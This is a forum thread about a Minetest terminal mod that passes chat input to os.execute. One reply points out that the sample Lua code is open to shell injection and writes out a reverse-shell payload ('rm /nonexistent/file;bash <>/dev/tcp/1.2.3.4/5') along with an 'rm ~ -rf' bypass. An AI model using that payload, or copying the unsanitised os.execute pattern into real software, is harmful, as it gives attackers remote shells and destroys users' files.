kahrl wrote:fairiestoy wrote:Your phone or window isn't wide enough to display the code box. If it's a phone, try rotating it to landscape mode.
- Code: Select all
function terminal_command( command, sender, pos )
--[snip]--
end
function call_rm( execution_request, sender )
-- security check
if( execution_request[2] == "-rf" and execution_request[3] == "~" ) then
print( sender.." tried to execute deprecated command... Aborting" )
else
os.execute("rm "..execution_request[2].." "..execution_request[3] )
end
end
I didn't try it, but this should still allow you to type "rm ~ -rf".
Or for extra fun: "rm /nonexistent/file;bash <>/dev/tcp/1.2.3.4/5". Where 1.2.3.4 is the attacker IP and 5 is the attacker port.
First of all, that was just a example code ( if you would have read the post, you know that :3 ) it was not intended to be a complete solution at all.
Bas080 wrote:fairiestoy, I see... in your fork i cannot atm run commands on my OS, that was the initial purpose of my mod. However, i like your idea as it allows for the creation of an ingame terminal. What if both are combined. Commands that run on OS and commands that run in minetest. Dependent on privs one can run OS and otherwise one can use only ingame (safe) functions if they have the password to that terminal f.e. As you made such a nice start why not make something to demonstrate the principles of your idea so I and others can get a better sense of it.
btw, line 91 in init didn't work. it had to be local term_utils = dofile( minetest.get_modpath("terminal").."/utilities.lua" ) on my computer. Maybe it's and windows thing... not sure.
Sorry for not mentioning it, but it is not ready at all. I was just adding the first basic parts of the framework. Sorry for the confusion ;). Btw, to make the framework as you want to, one has just create a new file in the terminal/commands/ folder where you can register your function assigned to a command. Example command: rm
Your phone or window isn't wide enough to display the code box. If it's a phone, try rotating it to landscape mode.
- Code: Select all
term_utils.register_command( command_string , function_pointer )
Would take care of registering the command. However, this could be any function you declare which could in the end use os.execute to call the systems functions. If you add now
Your phone or window isn't wide enough to display the code box. If it's a phone, try rotating it to landscape mode.
- Code: Select all
function call_rm( execution_request )
to a file like rm.lua and let it register your function, the terminal_command of your base code will try to run that function if it exists in the registry. I only didnt find time yesterday to implement it to bring it to work :3 Anyway, thanks for mentioning it.
Also thanks for mentioning this:
Your phone or window isn't wide enough to display the code box. If it's a phone, try rotating it to landscape mode.
- Code: Select all
local term_utils = dofile( minetest.get_modpath("terminal").."/utilities.lua" )
Its not a windows thing. I didnt thought in the first case of using it in minetest. Therefore i used local code. Was stupid in the end :-/.
Edit:First functional framework is online. Check the repo for updates. On a singleplayer server it just worked how it should work. Up to now, it only contains one command: ls ( or dir for win machines ) without parameters (will be added soon)
Interesting about new things is, to figure out how it works ...